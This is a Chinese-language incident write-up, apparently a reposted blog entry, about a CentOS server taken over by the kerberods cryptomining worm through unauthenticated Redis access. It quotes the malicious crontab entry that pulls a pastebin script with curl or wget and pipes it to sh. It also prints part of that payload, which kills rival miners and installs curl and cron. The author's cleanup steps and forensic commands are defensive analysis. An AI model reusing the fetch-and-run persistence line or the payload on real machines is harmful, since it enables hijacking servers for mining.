Redis未授權訪問及安全組漏洞招致kerberods來挖礦
阿新 • • 發佈:2019-04-13
故障 raw wget 排查 web 查看 授權 現象 use 參考文檔
https://www.freebuf.com/articles/web/94237.html
https://www.4hou.com/vulnerable/13843.html
https://laucyun.com/17e194c26e4554cab975aae760bad553.html
https://www.freebuf.com/articles/web/94237.html
https://www.4hou.com/vulnerable/13843.html
https://laucyun.com/17e194c26e4554cab975aae760bad553.html
現象
服務器CPU飆升
故障時間2019.4.10 17:50
top及htop查看信息只能看到1個cpu信息,默認是4個
排錯
排查發現crontab異常
[[email protected]_3_114_centos ~]# crontab -l */15 * * * * (curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sh
先簡單解決問題
重命名curl wget yum等工具,然後停止cron服務,刪除crontab任務並禁錮cron任務中root文件,並修改host偽造pastebin.com解析,問題暫時得到了解決
然後分析問題
手工試了下這個腳本的威力,具體的也可以訪問這個網站查看 https://pastebin.com/raw/xmxHzu5P ,這裏會***啟動文件/usr/sbin/kerberods
後來網上查了下該病毒短時間內即造成大量 Linux 主機淪陷,它的傳播方式分為三種,分別是:
- 從 known_hosts 文件讀取 IP 列表,用於登錄信任該主機的其他主機,並控制它們執行惡意命令
- 利用 Redis 未授權訪問和弱密碼這兩種常見的配置問題進行控制它們執行惡意命令
- 利用 SSH 弱密碼進行爆破,然後控制它們執行惡意命令
[[email protected]_3_114_centos tmp]# wgetold -q -O- https://pastebin.com/raw/xmxHzu5P export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin mkdir -p /tmp chmod 1777 /tmp rm -rf /tmp/go.sh rm -rf /tmp/go2.sh ps -ef|grep -v grep|grep hwlh3wlh44lh|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep Circle_MI|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep get.bi-chi.com|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep hashvault.pro|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep nanopool.org|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep /usr/bin/.sshd|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep "xmr"|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep "xig"|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep "ddgs"|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep "qW3xT"|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep "wnTKYg"|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep "t00ls.ru"|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep "sustes"|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep "thisxxs"|awk ‘{print $2}‘ | xargs kill -9 ps -ef|grep -v grep|grep "hashfish"|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep "kworkerds"|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep "/tmp/devtool"|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep "systemctI"|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep "kpsmouseds"|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep "kthrotlds"|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep "kintegrityds"|awk ‘{print $2}‘|xargs kill -9 ps -ef|grep -v grep|grep "suolbcc"|awk ‘{print $2}‘|xargs kill -9 ps aux|grep -v grep|grep -v khugepageds|awk ‘{if($3>=80.0) print $2}‘|xargs kill -9 apt-get install curl -y||yum install curl -y||apk add curl -y apt-get install cron -y||yum install crontabs -y||apk add cron -y systemctl start crond systemctl start cron systemctl start crontab service
查找當時哪些文件被修改了
[[email protected]_3_114_centos / ]#find ./ -mtime -1 -type f -exec ls -lt {} \; | grep "17:50"
-rw-r--r-- 1 root root 9216 Apr 10 17:50 ./etc/pki/nssdb/cert9.dbold
-rw-r--r-- 1 root root 11264 Apr 10 17:50 ./etc/pki/nssdb/key4.dbold
-rw-r--r-- 1 root root 35773 Apr 10 17:50 ./etc/ld.so.cache
-rw-r--r-- 1 root root 35773 Apr 10 17:50 ./etc/crond.d/tomcat
...
發現問題文件
發現一個比較可疑的文件,文件當時沒用刪除是二進程形式,通過xxd能查看,大概如下內容,比較奇怪的是redis格式的,而且還有redis版本,後來谷歌發現redis無密碼確實有被利用的風險
[[email protected]_3_114_centos / ]#cat /etc/crond.d/tomcat
REDIS 0008%09 redis-ver4.0.6 redis-bits Redis未授權訪問及安全組漏洞招致kerberods來挖礦